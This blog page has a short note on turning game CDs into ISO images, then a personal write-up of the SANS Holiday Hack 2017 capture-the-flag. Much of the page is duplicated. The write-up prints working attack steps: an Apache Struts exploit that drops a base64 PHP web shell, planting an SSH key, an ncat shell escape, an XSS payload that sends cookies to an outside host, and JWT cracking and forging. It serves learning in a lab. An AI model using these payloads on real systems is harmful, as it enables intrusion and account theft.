Another interesting thing to note: I could copy the CD directory structure, without making an iso. I had to doctor the multiple cds into one to fit the directory structure that the installer was expecting, but that worked as well, without making an iso.
I did have an issue with game compatibility. I found directions about how to fix it, so it runs fine now. Nothing wrong with the iso, just wasn't made to be ran on newer OSs.
If you have a Mac, you can use Disk Utility to convert the CDs to .cdr files. If the games are made for other devices, you will have to convert those .cdr files to .isos. I didn't have much luck converting the .cdr files to .isos with the hdiutil command. The isowas fine for my Mac, but for some reason, it would not open on Windows devices. The Windows devices kept popping up a message that said, "corrupt iso image". That command is:
hdiutil convert <game>.cdr -format -UDTO -o <game>.iso
Maybe others will have better luck?
So, I turned to Ubuntu. There's a nice command on there called, "mkisofs". The biggest hurdle I had with this was finding a CD-Rom drive my Ubuntu machine would read. Other than that, it went without a hitch. dd could also be used, but it wasn't good for this case because you have to unmount the device to create an image from it. I'm using an external drive.
The dd command is:
dd of=<directory/of/cd/rom> if=<output/directory/andfile.iso>
Ubuntu auto mounts it. Yes, I know, umount, then run dd...
With mkisofs, you don't have to unmount the drive.
The exact command I used was:
mkisofs -lJR -o <gamename.iso> <directoryname>
That's a lower-case L by the way, not a upper-case I.
You can specify multiple directories. Just make sure that for a game for instance, that it has the same directory structure that the installer expects. Another issue you may come across is copyright protections. Sometimes this won't work because of that. Fortunately, for many of my games, I didn't have an issue.
Another interesting thing to note: I could copy the CD directory structure, without making an iso. I had to doctor the multiple cds into one to fit the directory structure that the installer was expecting, but that worked as well, without making an iso.
I did have an issue with game compatibility. I found directions about how to fix it, so it runs fine now. Nothing wrong with the iso, just wasn't made to be ran on newer OSs.
Thursday, January 11, 2018
Holiday Hack 2017 Write Up
Just Copy/Pasted this from my write-up. I'm sick right now, after getting over an illness during the holiday. Probably plenty of typos and stuff. Finished it the night it was due.
Disappointed with myself this year. Didn't work on it as much as I did other challenges. Sick during holiday break. First with an infection I was taking antibiotics for. Then something else.
Reflected over past year. Brother died last year. He was young, so this was unexpected. Christmas was always his favorite time of year. Wasn't really close to him, but I still regret not spending time with him more often. You just feel like you have a long time, and then they're gone in the blink of an eye.
So my heart just wasn't in it this year. Hopefully this is good enough for now. Might add pics later and hope to solve the rest later.
Update: I'm adding pics and stuff. Feeling a little better. I just wanted to note, these challenges aren't necessarily as easy as people make them look in the write-ups. For example, I don't just know stuff. If I really want to learn stuff, I spend a lot of time looking stuff up. It's not easy at first, but you'd be amazed at how much knowledge you can accumulate just by looking things up and learning from others. Don't be discouraged by these write-ups. Be encouraged. If someone like me can do this, so can you. :) Click on any pictures that look small. They look much better in the pop up.
Terminals
1. Candy Cane Striper Terminal
https://unix.stackexchange.com/questions/157997/run-a-binary-owned-by-root-without- sudo
http://man7.org/linux/man-pages/man8/ld.so.8.html
Getting the Candy Cane Striper Up and Running
Log on and read the clue.
If you forget the clue after the screen fills up:
cat /etc/motd
Do a directory listing that shows hidden files and check permissions.
ls -la
The Candy Cane Striper can only be read and written by root, read by group, read by other.
Don’t despair. With binaries, you can run a binary owned by root without sudo by using a dynamic linker/loader, in which you have read, but not execute permissions.
elf@fa03be74d52a:~$ /lib64/ld-linux-x86-64.so.2 /home/elf/CandyCaneStriper
2. Linux Command Hijacking Terminal
Running ElfTalkd
Log on and read the clue.
Do a directory listing that shows hidden files to see what is in the current directory. ls -la
Unfortunately, this one executable as easy to find as the Candy Cane Striper executable.
find / -name elftalkd isn’t helpful either.
Find is usually ran out of /usr/bin/find, so using the command
/usr/bin/find / -name elftalkd
finds us our executable.
The executable runs out of:
/run/elftalk/bin/elftalkd
So, using the command
/run/elftalk/bin/elftalkd
we can run it.
3. Troublesome Process Terminal
use
ps aux
to look for the executable. It shows that 8 was the pid of the process. Then run:
/bin/kill -9 8
Disappointed with myself this year. Didn't work on it as much as I did other challenges. Sick during holiday break. First with an infection I was taking antibiotics for. Then something else.
Reflected over past year. Brother died last year. He was young, so this was unexpected. Christmas was always his favorite time of year. Wasn't really close to him, but I still regret not spending time with him more often. You just feel like you have a long time, and then they're gone in the blink of an eye.
So my heart just wasn't in it this year. Hopefully this is good enough for now. Might add pics later and hope to solve the rest later.
Update: I'm adding pics and stuff. Feeling a little better. I just wanted to note, these challenges aren't necessarily as easy as people make them look in the write-ups. For example, I don't just know stuff. If I really want to learn stuff, I spend a lot of time looking stuff up. It's not easy at first, but you'd be amazed at how much knowledge you can accumulate just by looking things up and learning from others. Don't be discouraged by these write-ups. Be encouraged. If someone like me can do this, so can you. :) Click on any pictures that look small. They look much better in the pop up.
Holiday Hack Challenge Banner |
Terminals
1. Candy Cane Striper Terminal
https://unix.stackexchange.com/questions/157997/run-a-binary-owned-by-root-without- sudo
http://man7.org/linux/man-pages/man8/ld.so.8.html
Getting the Candy Cane Striper Up and Running
Log on and read the clue.
If you forget the clue after the screen fills up:
cat /etc/motd
Do a directory listing that shows hidden files and check permissions.
ls -la
The Candy Cane Striper can only be read and written by root, read by group, read by other.
Don’t despair. With binaries, you can run a binary owned by root without sudo by using a dynamic linker/loader, in which you have read, but not execute permissions.
elf@fa03be74d52a:~$ /lib64/ld-linux-x86-64.so.2 /home/elf/CandyCaneStriper
Candy Cane Striper Solution |
Candy Cane Striper Up and Running |
2. Linux Command Hijacking Terminal
Running ElfTalkd
Log on and read the clue.
Do a directory listing that shows hidden files to see what is in the current directory. ls -la
Unfortunately, this one executable as easy to find as the Candy Cane Striper executable.
find / -name elftalkd isn’t helpful either.
Find is usually ran out of /usr/bin/find, so using the command
/usr/bin/find / -name elftalkd
finds us our executable.
The executable runs out of:
/run/elftalk/bin/elftalkd
So, using the command
/run/elftalk/bin/elftalkd
we can run it.
ElfTalkd Solution |
Elftalkd Running |
3. Troublesome Process Terminal
use
ps aux
to look for the executable. It shows that 8 was the pid of the process. Then run:
/bin/kill -9 8
Troublesome Process Solution |
Troublesome Process Not Running |
4. Train Startup
The train was compiled to run on an arm architecture.
file trainstartup
file -i trainstartup
This particular linux kernel is an x86 architecture.
uname -a
qemu-arm is an emulator used to run arm executables on an x86-64 architecture. So, simply typing:
qemu-arm ./trainstartup
runs the program.
5. IsIt42 Terminal
This one seems similar to library path hijacking in Windows. In other words, we exploit the order in which Linux looks for libraries. More information about this technique can be found at:
https://pen-testing.sans.org/blog/2017/12/06/go-to-the-head-of-the-class-ld-preload-for- the-win
Note: This only works on c libraries. It does not work on user-defined functions.
First, read the goal of this terminal. The goal is to make the program always return 42. Then read the sample program.
cat isit42.c.un
The part that is returning a random integer is
return rand() % 4096;
rand() is a c library.
The person that commented the code gave a clue as to what to do because they said that the prototype for rand is: int rand(void);
A library must be written to run in place of the one in the isit42 program.
You may use vim or whatever editor you like. Nano is just one of them.
nano isit42test.c
Type the following:
int rand(void){
printf(“Highjacking rand() to return 42.\n”);
return 42;
}
Save the file.
Next, the shared library should be compiled. Make sure to add the -shared and -fPIC at the end, or it won’t make a shared library.
gcc isit42test.c -o isit42test -shared -fPIC
The train was compiled to run on an arm architecture.
file trainstartup
file -i trainstartup
This particular linux kernel is an x86 architecture.
uname -a
qemu-arm is an emulator used to run arm executables on an x86-64 architecture. So, simply typing:
qemu-arm ./trainstartup
runs the program.
Train Startup Solution |
Train Running |
5. IsIt42 Terminal
This one seems similar to library path hijacking in Windows. In other words, we exploit the order in which Linux looks for libraries. More information about this technique can be found at:
https://pen-testing.sans.org/blog/2017/12/06/go-to-the-head-of-the-class-ld-preload-for- the-win
Note: This only works on c libraries. It does not work on user-defined functions.
First, read the goal of this terminal. The goal is to make the program always return 42. Then read the sample program.
cat isit42.c.un
The part that is returning a random integer is
return rand() % 4096;
rand() is a c library.
The person that commented the code gave a clue as to what to do because they said that the prototype for rand is: int rand(void);
A library must be written to run in place of the one in the isit42 program.
You may use vim or whatever editor you like. Nano is just one of them.
nano isit42test.c
Type the following:
int rand(void){
printf(“Highjacking rand() to return 42.\n”);
return 42;
}
Save the file.
Next, the shared library should be compiled. Make sure to add the -shared and -fPIC at the end, or it won’t make a shared library.
gcc isit42test.c -o isit42test -shared -fPIC
Now, the library that is desired to be loaded must be found before the actual c library
that the program is referencing is found. The isit42 program is also ran during this step.
LD_PRELOAD=“$PWD/isit42test” ./isit42
It should return 42.
This next part goes by pretty quickly. When you execute the program, with the library preloaded, you'll briefly see it state that it's "Returning 42!" or whatever you put in that printf statement in the library you made. That means you successfully highjacked the library. You should see it return 42. As long as you preload your library, it will always return 42.
6. Christmas Songs Data Analysis Terminal
There is a command line program that is often on Linux called sqlite3. It is used for analyzing databases.
sqlite3 christmassongs.db
To see the information about the tables in the databases, you can use the .tables command.
.tables
To see the information about the columns in the tables, you can use the .schema <table> command.
.schema songs
.schema likes
There are two tables in the database. In order to get the most liked song, we have to tell sqlite3 that we want to get information from both tables that is related to each other. In relational databases, we can get information from both tables that is related to each other by the use of primary keys and foreign keys. In this case, the songs.id is the primary key for the songs table. The songs.id is also a foreign key for the likes table. In the likes table, songs.id is known as songid.
So, part of our query will be “where songs.id=likes.songid”.
We use the . notation above to tell sqlite that we want the id column from the songs table, and the songid column from the likes tables.
Often, as a database grows, an entry may be put into the database more than one time. In this case, the song title may have been added more than once. The following puts all of the repeat titles into one line.
So, part of our query will be “group by songs.title”
As a result of the song title being added more than once, we will have to add the number of likes for that specific title together. We do this by using the “sum” function in sql.
LD_PRELOAD=“$PWD/isit42test” ./isit42
It should return 42.
Cat Sample Program |
Highjacking Rand() |
Compile New Library - LD Preload |
Hijacked Rand() Library |
6. Christmas Songs Data Analysis Terminal
Christmas Songs Terminal |
There is a command line program that is often on Linux called sqlite3. It is used for analyzing databases.
sqlite3 christmassongs.db
To see the information about the tables in the databases, you can use the .tables command.
.tables
To see the information about the columns in the tables, you can use the .schema <table> command.
.schema songs
.schema likes
Christmas Songs DB |
There are two tables in the database. In order to get the most liked song, we have to tell sqlite3 that we want to get information from both tables that is related to each other. In relational databases, we can get information from both tables that is related to each other by the use of primary keys and foreign keys. In this case, the songs.id is the primary key for the songs table. The songs.id is also a foreign key for the likes table. In the likes table, songs.id is known as songid.
So, part of our query will be “where songs.id=likes.songid”.
We use the . notation above to tell sqlite that we want the id column from the songs table, and the songid column from the likes tables.
Often, as a database grows, an entry may be put into the database more than one time. In this case, the song title may have been added more than once. The following puts all of the repeat titles into one line.
So, part of our query will be “group by songs.title”
As a result of the song title being added more than once, we will have to add the number of likes for that specific title together. We do this by using the “sum” function in sql.
So, part of our query will be sum(likes.like)
We would like to get the most liked song, so we order by the most liked song in descending order. We limit our query to 10, so that we only return the 10 most liked songs. We could limit it to one, but I wanted to make sure that the query was working as intended.
The full query is below:
select sum(likes.like),songs.id,likes.songid,songs.title from songs,likes where songs.id=likes.songid group by songs.title order by sum(likes.like) desc limit 10;
Looks like the Answer is Stairway to Heaven. We'll run the program "runtoanswer" to be sure.
First, exit out of sqlite3.
.quit
Now, run the program.
./runtoanswer
7. Web Log Terminal Challenge
The goal of this challenge was to analyze an apache access log to find the least
common browser. Fortunately, it is plain text, and has well defined delimiters, so if one
has a decent understanding of some Linux command line tools, it shouldn’t be tough. If
not, Google is your friend. There are many ways to solve this one, only a google search
away. Here is one way:
cat access.log | awk -F\" '{print $6}' | sort -n | uniq -c | sort -n | head -n 10
Broken down:
cat access.log | - means send the access log file into the next command.
awk -F\” ‘{print $6}; | - the delimiter in this log is a “ character. Separate each line into pieces indicated by this delimiter. I only want the 6th piece. The 6th piece is the user agent string. Send the 6th piece output to the next command.
sort -n | - sort the 6th piece by number of occurrences. Send that output to the next command.
uniq -c - I only want to see unique occurrences of the 6th piece. Send those to the next command.
sort -n | Sort the unique instances of the 6th piece by number of occurrences. Send that output to the next command.
head -n 10 - only show me the first 10 in the output. Since the default order that it is sorted is ascending, the first one of the list will be the least used user agent.
8. Shadow Restoration Challenge
Resources:
https://serverfault.com/questions/133229/what-is-the-shadow-group-used-for
man sudo - found a switch to run as a group. (I did this on another linux box. The game terminal wouldn't let me do it.)
We would like to get the most liked song, so we order by the most liked song in descending order. We limit our query to 10, so that we only return the 10 most liked songs. We could limit it to one, but I wanted to make sure that the query was working as intended.
The full query is below:
select sum(likes.like),songs.id,likes.songid,songs.title from songs,likes where songs.id=likes.songid group by songs.title order by sum(likes.like) desc limit 10;
Christmas Songs DB Query |
First, exit out of sqlite3.
.quit
Now, run the program.
./runtoanswer
Christmas DB Number 1 Song |
7. Web Log Terminal Challenge
Web Log Terminal |
cat access.log | awk -F\" '{print $6}' | sort -n | uniq -c | sort -n | head -n 10
Broken down:
cat access.log | - means send the access log file into the next command.
awk -F\” ‘{print $6}; | - the delimiter in this log is a “ character. Separate each line into pieces indicated by this delimiter. I only want the 6th piece. The 6th piece is the user agent string. Send the 6th piece output to the next command.
sort -n | - sort the 6th piece by number of occurrences. Send that output to the next command.
uniq -c - I only want to see unique occurrences of the 6th piece. Send those to the next command.
sort -n | Sort the unique instances of the 6th piece by number of occurrences. Send that output to the next command.
head -n 10 - only show me the first 10 in the output. Since the default order that it is sorted is ascending, the first one of the list will be the least used user agent.
After running cat access.log ... |
Web Terminal Challenge Answer |
Resources:
https://serverfault.com/questions/133229/what-is-the-shadow-group-used-for
man sudo - found a switch to run as a group. (I did this on another linux box. The game terminal wouldn't let me do it.)
The goal of this one is to restore the shadow file from a backup.
Fortunately, this user is a member of the sudo group. This can be found by running:
sudo -l
This user has the ability to run the find command. You can see that near the bottom where it says, "User elf may run the following commands..." It also says that the user can run it without a password. it says, "NOPASSWD". And that elf is a member of the shadow group. "(elf : shadow)".
If sudo find /etc/shadow.bak -exec cp {} /etc/shadow \; is used, the elf password is required. Unfortunately, that password is not known.
The sudo command can be used as another user or group. The password for any users is not known, so use the -g switch to use a group. The group in Linux responsible for password managment - as well as other things - is the shadow group. The following command works, without a password.
sudo -g shadow find /etc/shadow.bak -exec cp {} /etc/shadow \;
The {} is another way of saying, /etc/shadow.bak. One could actually use /etc/ shadow.bak in place of the {} and it will work just fine. Just simpler to use that {} syntax.
The command says, “Run as a member of the shadow group”, “Find the shadow backup.”, “Overwrite the shadow file with the shadow backup”.
After the shadow file is restored, the inspect_da_box program must be run to complete this terminal.
inspect_da_box
Holiday Hack Challenge Questions
Fortunately, this user is a member of the sudo group. This can be found by running:
sudo -l
Shadow Terminal |
This user has the ability to run the find command. You can see that near the bottom where it says, "User elf may run the following commands..." It also says that the user can run it without a password. it says, "NOPASSWD". And that elf is a member of the shadow group. "(elf : shadow)".
If sudo find /etc/shadow.bak -exec cp {} /etc/shadow \; is used, the elf password is required. Unfortunately, that password is not known.
The sudo command can be used as another user or group. The password for any users is not known, so use the -g switch to use a group. The group in Linux responsible for password managment - as well as other things - is the shadow group. The following command works, without a password.
sudo -g shadow find /etc/shadow.bak -exec cp {} /etc/shadow \;
The {} is another way of saying, /etc/shadow.bak. One could actually use /etc/ shadow.bak in place of the {} and it will work just fine. Just simpler to use that {} syntax.
The command says, “Run as a member of the shadow group”, “Find the shadow backup.”, “Overwrite the shadow file with the shadow backup”.
After the shadow file is restored, the inspect_da_box program must be run to complete this terminal.
inspect_da_box
Shadow File Successfully Restored |
Holiday Hack Challenge Questions
-
1) Visit the North Pole and Beyond at the Winter Wonder Landing Level to collect the
first page of The Great Book using a giant snowball. What is the title of that page?
The title of that page is About This Book.
- 2) Investigate the Letters to Santa application at https:// l2s.northpolechristmastown.com. What is the topic of The Great Book page available in the web root of the server? What is Alabaster Snowball's password?
-
3) The North Pole engineering team uses a Windows SMB server for sharing
documentation and correspondence. Using your access to the Letters to Santa
server, identify and enumerate the SMB file-sharing server. What is the file server share name?
FileStor. For the record, I could log onto IPC$ as well. Just couldn’t get a directory listing. Seemed to let me change to another directory, though. Also, it gives a different error message when I try to write to the directory using “put” so it might be writable. FileStor gives NT_STATUS_ACCESS_DENIED opening remote file \test when I try to put test to it. IPC$ gives NT_STATUS_OBJECT_NAME_NOT_FOUND error when I try to put a test file to it.
SSH Port Forwarding to SMB Server |
SMB Protocol Via Browser |
Finder Asking Permission To Access Share |
Entering Alabaster's Creds to Access Share |
Selecting Share |
Contents of FileStor |
4) Elf Web Access (EWA) is the preferred mailer for North Pole elves, available internally at http://mail.northpolechristmastown.com. What can you learn from The Great Book page found in an e-mail on that server?
SSH Port Forwarding to Mail Server |
Setting Up Browser Proxy - Firefox |
E-Mail Showing Where Page 4 Was On the Mail Server. |
Mail Server - Page 4 - Rise of the Lollipop Guild |
Elves and Munchkins don’t like each other. They have a long-standing feud. It’s never been proven, but the Elves believe that the Munchkins have sent Munchkin Moles to the North Pole.
5) How many infractions are required to be marked as naughty on Santa’s Naughty and Nice List? What are the names of at least six insider threat moles? Who is throwing the snowballs from the top of the North Pole Mountain, and what is your proof?
a) 8 infractions are required to be marked as naughty on Santa’s Naughty and Nice List. (The lowest amount of infractions I could find for a naughty person was 8).
b) The insider moles are: Bog Questrian, Bini Aru - these two are known because they were mentioned in the BOLO:Munchkin Mole Advisory.
Known Munchkin Moles |
c) The Abominable Snow Monster, AKA Bumble, is throwing the giant snowballs - a page of the great book states that he’s throwing the snowballs - however, he’s under the influence of something magical that he ate. (If one plays thorough the game, it's revealed that he is throwing snowballs as well.
Great Book Page 5 |
Game Reveal |
6) The North Pole engineering team has introduced an Elf as a Service (EaaS) platform to optimize resource allocation for mission-critical Christmas engineering projects at http://eaas.northpolechristmastown.com. Visit the system and retrieve instructions for accessing The Great Book page from C:\greatbook.txt. Then retrieve The Great Book PDF file by following those directions. What is the title of The Great Book page?
SSH Port Forwarding to EAAS |
ssh -L 9000:10.142.0.5:80 alabaster_snowball@l2s.northpolechristmastown.com
ssh -L 9001:10.142.0.13:80 alabaster_snowball@l2s.northpolechristmastown.com
7) Like any other complex SCADA systems, the North Pole uses Elf-Machine Interfaces
(EMI) to monitor and control critical infrastructure assets. These systems serve many
uses, including email access and web browsing. Gain access to the EMI server through
the use of a phishing attack with your access to the EWA server. Retrieve The Great
Book page from C:\GreatBookPage7.pdf. What does The Great Book page describe?
I know from exploiting the e-mail server that one should probably use a DDE Injection in order to phish Alabaster Snowball to retrieve this page. It was hinted in some e-mails that Alabaster would click on any links in e-mails containing the words “gingerbread”, ”cookie,” and “recipe”. Shinny Upatree also gives the hint in the stocking talking about DDE. He also said that he reprimanded for a security violation and that Alabaster installs unnecessary software the EMI server all the time including Microsoft Office. DDE Injection can be done with Word, Excel, Outlook, Powerpoint - probably more stuff- but those are the products I've seen it done in articles.
Unfortunately, I couldn’t get any of my exploit
attempts to work. I’ll detail my attempts later in this write-up.
8) Fetch the letter to Santa from the North Pole Elf Database at http:// edb.northpolechristmastown.com. Who wrote the letter?
I just got into the edb/ldap server on the night that this was due, so I didn't get this one. I did get it afterwards though. I'm holding off on reading write-ups until I solve them. It was the Wizard of Oz. :)
I retrieved the np-auth token via XXS. I knew that I needed the np-auth item because of the web page source code. Click on the Support Link and find the XSS vulnerability. You can use a marker to test, or simply try to pop an alert.
It kept saying "Alert, Hacker" when I tried certain XSS payloads. I just played around with it a bit to find out what it was filtering on. An easier way would have been to check to see if there was any script that contained "Alert, Hacker!". It didn't take long to figure out what it was alerting on, though. It was just the word script. So, I'd have to try payloads that either obfuscated the word "script" or payloads that didn't contain the word script.
It won't let you put the marker in the Username and E-Mail because they have to be a certain format. So, put a valid username and e-mail in each text box and add the marker script to the message. Check the web page source code.
Looks like the Message part is vulnerable. When you look at the source code, that is where this is located.
Try filter evasion payloads until one pops an alert.
Now, change the payload so it dials back to you.
I had a script running that captures cookies, but as long as you have something that shows the request, you should be fine. The script just captures multiple cookies, or whatever I'm asking for - in this case np-auth. I just named it cookie catcher.php because I originally thought I needed a cookie. I only set it up this way because I wanted to be certain I didn't miss it. This script saves the cookies to a log that I can look at later.
I decoded the token using pyjwt. It didn’t have a key, so decoding it was as simple as adding ‘’ for the key. The decoded token looked kind of like ldap.
I cracked the secret using jwtcrack. It was ‘3lv3s’.
I then used py-jwt to forge a new token with the decoded token and changing the “expires” date.
9) Which character is ultimately the villain causing the giant snowball problem. What is the villain's motive?
Glenda The Good Witch. She wants to start a war between munchkins and elves so that she can profit from selling magic/spells to both sides.
L2S Server
This server was running Apache Struts, and was vulnerable to the exploit detailed here:
https://pen-testing.sans.org/blog/2017/12/05/why-you-need-the-skills-to-tinker-with- publicly-released-exploit-code
Sparkle Redberry gave the hints for this challenge.
Always check the source of the webpage. The webpage indicated that there was another website. dev.northpolechristmastown.com.
The Dev Version shows that it's running Apache Struts.
I used the tool mentioned in the SANS Pen Testing Blog Post mentioned earlier to upload a web shell: CVE-2017-9805.py I named it struts_exploit.py so I would remember what it was way in the future.
python struts_exploit.py -u https://dev. northpolechristmastown.com/ orders.xhtml -c "/bin/echo 'PGh0bWw+ Cjxib2R5Pgo8Zm9ybSBtZXRob2Q9Ik dFVCIgbmFtZT0iPD9waHAgZWNobyBi YXNlbmFtZSgkX1NFUlZFUlsnUEhQX1 NFTEYnXSk7ID8+ Ij4KPGlucHV0IHR5cGU9IlRFWFQiIG 5hbWU9ImNtZCIgaWQ9ImNtZCIgc2l6 ZT0iODAiPgo8aW5wdXQgdHlwZT0iU1 VCTUlUIiB2YWx1ZT0iRXhlY3V0ZSI+ CjwvZm9ybT4KPHByZT4KPD9waHAKIC AgIGlmKCRfR0VUWydjbWQnXSkKICAg IHsKICAgICAgICBzeXN0ZW0oJF9HRV RbJ2NtZCddKTsKICAgIH0KPz4KPC9w cmU+ CjwvYm9keT4KPHNjcmlwdD5kb2N1bW VudC5nZXRFbGVtZW50QnlJZCgiY21k IikuZm9jdXMoKTs8L3NjcmlwdD4KPC 9odG1sPg==' > /var/www/html/quackquackhere. php"
That base64 is a web shell.
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
Then you just visit the webpage with your shell file name tacked on the end and the command you want to run.
https://l2s.northpolechristmastown.com/quackquackhere.php?ls
I know from exploiting the e-mail server that one should probably use a DDE Injection in order to phish Alabaster Snowball to retrieve this page. It was hinted in some e-mails that Alabaster would click on any links in e-mails containing the words “gingerbread”, ”cookie,” and “recipe”. Shinny Upatree also gives the hint in the stocking talking about DDE. He also said that he reprimanded for a security violation and that Alabaster installs unnecessary software the EMI server all the time including Microsoft Office. DDE Injection can be done with Word, Excel, Outlook, Powerpoint - probably more stuff- but those are the products I've seen it done in articles.
SSH Port Forwarding To Mail Server |
Setting Up Proxy in Browser - Firefox |
Alabaster Hinting he will click on anything regarding gingerbread cookies. |
Tarpin McJinglehauser stating to be on the lookout for certain e-mails. |
Minty hinting that they may be vulnerable to DDE Injection. |
Alabaster pulling down the file using nc. |
Alabaster stating that he has nc installed to his $PATH. |
Alabaster stating that they have powershell. |
Shinny Upatree Reprimanded |
Shinny Upatree Unnecessary Software |
8) Fetch the letter to Santa from the North Pole Elf Database at http:// edb.northpolechristmastown.com. Who wrote the letter?
I just got into the edb/ldap server on the night that this was due, so I didn't get this one. I did get it afterwards though. I'm holding off on reading write-ups until I solve them. It was the Wizard of Oz. :)
I retrieved the np-auth token via XXS. I knew that I needed the np-auth item because of the web page source code. Click on the Support Link and find the XSS vulnerability. You can use a marker to test, or simply try to pop an alert.
EDB Server |
EDB Support Page |
EDB Source |
XSS Marker Script |
Message Vulnerable to XSS |
Try filter evasion payloads until one pops an alert.
Try Payloads Until One Pops an alert |
XSS Alert Success! |
<IMG SRC=# onerror=window.open("http://x.x.x.x/cookiecatcher.php?cookie="+document.cookie)>
I had a script running that captures cookies, but as long as you have something that shows the request, you should be fine. The script just captures multiple cookies, or whatever I'm asking for - in this case np-auth. I just named it cookie catcher.php because I originally thought I needed a cookie. I only set it up this way because I wanted to be certain I didn't miss it. This script saves the cookies to a log that I can look at later.
I decoded the token using pyjwt. It didn’t have a key, so decoding it was as simple as adding ‘’ for the key. The decoded token looked kind of like ldap.
Alabaster's JWT Token |
Blank Key |
Decoding Alabaster's JWT Token With PyJWT |
I cracked the secret using jwtcrack. It was ‘3lv3s’.
Cracking JWT Secret With jwtcrack |
I then used py-jwt to forge a new token with the decoded token and changing the “expires” date.
Forging Alabaster Snowball's JWT Token |
9) Which character is ultimately the villain causing the giant snowball problem. What is the villain's motive?
Glenda The Good Witch. She wants to start a war between munchkins and elves so that she can profit from selling magic/spells to both sides.
Glenda did it. Can't say I'm surprised. I always suspected she was up to no good. |
This server was running Apache Struts, and was vulnerable to the exploit detailed here:
https://pen-testing.sans.org/blog/2017/12/05/why-you-need-the-skills-to-tinker-with- publicly-released-exploit-code
Sparkle Redberry gave the hints for this challenge.
Always check the source of the webpage. The webpage indicated that there was another website. dev.northpolechristmastown.com.
Dev Version of L2S |
The Dev Version shows that it's running Apache Struts.
Running Apache Struts |
python struts_exploit.py -u https://dev.
That base64 is a web shell.
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
Then you just visit the webpage with your shell file name tacked on the end and the command you want to run.
https://l2s.northpolechristmastown.com/quackquackhere.php?ls
I found it easier to upload my public key into the authorized_keys file and log on via ssh
before I found the password. Unfortunately, logging in via ssh left me in a restricted
shell.
python struts_exploit.py -u https://dev. northpolechristmastown.com/ orders.xhtml -c "/bin/echo '<my pub key here>' >> /home/alabaster.snowball/.ssh/authorized_keys"
I'm not afraid of people having my public key. Now if I showed my private key, that would be another story. I'm reverting to a snap shot on that VM though. So the key won't be on there at any rate whether it's safe or not.
Then I could just ssh in, presenting my private key. Learned this in NetWars. :) Like so:
ssh -i <private key file> alabaster_snowball@l2s.northpolechristmastown.com
Escaping RBash
I tried using tee as detailed here: https://pen-testing.sans.org/blog/2017/12/06/a-spot- of-tee, to break out of rbash. I was unsuccessful.
I found out that I could do dot (.) sourcing to get around not being able to use /. to run a command. I still couldn’t get my script to run properly. I was probably trying a payload that wasn’t correct.
https://superuser.com/questions/176783/what-is-the-difference-between-executing-a-bash-script-vs-sourcing-it
Since I couldn’t get the tee method to work, I found another way to escape rbash. I looked at alabaster_snowball’s .bashrc file in his home directory and found the code that was restricting users to the directory I was in and the path to the programs I was able to run in the restricted shell.
cat /home/alabaster.snowball/.bashrc
So then I did “ls /usr/local/rbin” to see what programs I could use.
I’ve used ncat several times and remembered that I could execute
commands with it. So I tried ncat -l 59000 --exec “/bin/bash” &. Then I connected to my
listener by typing ncat 127.0.0.1 59000.
If you've ever dealt with ncat, sometimes it is hard to tell that there is a prompt there. It looks like a blank space, but if you type a commands, like cd .. and ls, it will show the output. I know I escaped because in rbash, you can't change directories.
From the escaped shell, I could observe what other users were doing by typing “/bin/ps aux”. Someone locked down the $PATH, so I had to resort to full path naming to run programs - also called absolute paths. I learned quite a bit by watching the other players and downloading some of their exploit attempts. I carefully examined the exploits. Out of the restricted shell, I could type /bin/cat /etc/hosts to find some machines around me. I also used nmap to scan the machines around the l2s server.
I found Alabaster Snowball’s password in the tomcat dev files.
From the hints, I realized that I didn’t actually have to do much on this box other than to use it as a pivot into the internal network.
ssh -L 9000:10.142.0.x:<port number I’m interested in here> alabaster.snowball@l2s.northpolechristmastown.com
SMB Server
After scanning the systems using the hint provided by Holly Evergreen, I found an SMB Server. smbclient, for whatever reason wouldn’t work for me. So, I instead used ssh forwarding to forward the ip of the smb server to my machine. I have the pics posted earlier - in the "Holiday Hack Questions" Section.
ssh -L 9000:10.142.0.7:445
I didn’t want to use port 445 because I would have to sudo.
My machine is a Mac, so I opened up a browser and typed smb://127.0.0.1:9000. Finder picked up that I wanted to open a share and prompted me if I wanted to open the share with Finder. So, I clicked OK. Then a login prompt popped up. I put in Alabaster
python struts_exploit.py -u https://dev.
Pub Key |
Then I could just ssh in, presenting my private key. Learned this in NetWars. :) Like so:
ssh -i <private key file> alabaster_snowball@l2s.northpolechristmastown.com
Escaping RBash
I tried using tee as detailed here: https://pen-testing.sans.org/blog/2017/12/06/a-spot- of-tee, to break out of rbash. I was unsuccessful.
I found out that I could do dot (.) sourcing to get around not being able to use /. to run a command. I still couldn’t get my script to run properly. I was probably trying a payload that wasn’t correct.
https://superuser.com/questions/176783/what-is-the-difference-between-executing-a-bash-script-vs-sourcing-it
Since I couldn’t get the tee method to work, I found another way to escape rbash. I looked at alabaster_snowball’s .bashrc file in his home directory and found the code that was restricting users to the directory I was in and the path to the programs I was able to run in the restricted shell.
cat /home/alabaster.snowball/.bashrc
Restricting Users to RBash |
So then I did “ls /usr/local/rbin” to see what programs I could use.
What Can I Execute In RBash? |
Escaped From RBash |
From the escaped shell, I could observe what other users were doing by typing “/bin/ps aux”. Someone locked down the $PATH, so I had to resort to full path naming to run programs - also called absolute paths. I learned quite a bit by watching the other players and downloading some of their exploit attempts. I carefully examined the exploits. Out of the restricted shell, I could type /bin/cat /etc/hosts to find some machines around me. I also used nmap to scan the machines around the l2s server.
I found Alabaster Snowball’s password in the tomcat dev files.
From the hints, I realized that I didn’t actually have to do much on this box other than to use it as a pivot into the internal network.
ssh -L 9000:10.142.0.x:<port number I’m interested in here> alabaster.snowball@l2s.northpolechristmastown.com
SMB Server
After scanning the systems using the hint provided by Holly Evergreen, I found an SMB Server. smbclient, for whatever reason wouldn’t work for me. So, I instead used ssh forwarding to forward the ip of the smb server to my machine. I have the pics posted earlier - in the "Holiday Hack Questions" Section.
ssh -L 9000:10.142.0.7:445
I didn’t want to use port 445 because I would have to sudo.
My machine is a Mac, so I opened up a browser and typed smb://127.0.0.1:9000. Finder picked up that I wanted to open a share and prompted me if I wanted to open the share with Finder. So, I clicked OK. Then a login prompt popped up. I put in Alabaster
Snowball’s credentials. They were username: alabaster_snowball; password:
stream_unhappy_buy_loss.
